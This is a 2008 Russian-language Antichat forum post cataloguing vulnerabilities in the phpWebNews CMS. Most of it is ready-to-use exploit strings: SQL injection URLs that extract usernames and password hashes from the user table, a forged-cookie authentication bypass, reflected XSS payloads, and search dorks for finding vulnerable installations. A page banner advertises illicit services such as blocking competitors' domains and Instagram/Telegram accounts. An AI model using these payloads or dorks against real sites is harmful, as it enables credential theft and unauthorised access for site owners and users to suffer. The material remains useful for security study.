Форум АНТИЧАТ - [ Обзор уязвимостей phpWebNews ]

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
[ Обзор уязвимостей phpWebNews ]

Опции темы

Поиск в этой теме

Опции просмотра

[ Обзор уязвимостей phpWebNews ]

26.07.2008, 23:28

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

[ Обзор уязвимостей phpWebNews ]

phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability

Воздействие:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «det» сценарием bukutamu.php и в параметре «id_kat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Exploit:

Код:

http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*

phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability

Exploit:

Код:

http://site.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--

phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vulnerability

Exploit:

PHP код:


		
			
javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;";

phpwebnews v.1 Multiple Cross Site Scripting Vulnerabilites

Exploit:

Код:

www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script>

www.example.com/[path]/index.php?m_txt=<script>alert(/the_Edit0r/);</script> 

www.example.com/[path]/bukutamu.php?m_txt=<script>alert(/the_Edit0r/);</script>

Dork:

Powered by PHPWebNews
Powered by PHPWebNews v1.0
Powered by PHPWebNews v2.0
allinurl:index.php?id_kat=

Download phpWebNews:

phpwebnews-mysql 0.2
phpwebnews-posgresql 0.1

Последний раз редактировалось ~!DoK_tOR!~; 27.07.2008 в 02:06..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[Обзор уязвимостей в форумных движках]	Grey	Форумы	48	28.12.2009 20:03
Обзор уязвимостей [Oracle]	~!DoK_tOR!~	Сценарии/CMF/СMS	3	20.07.2008 04:44
[ Обзор уязвимостей OpenBSD ]	~!DoK_tOR!~	*nix	6	14.07.2008 19:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход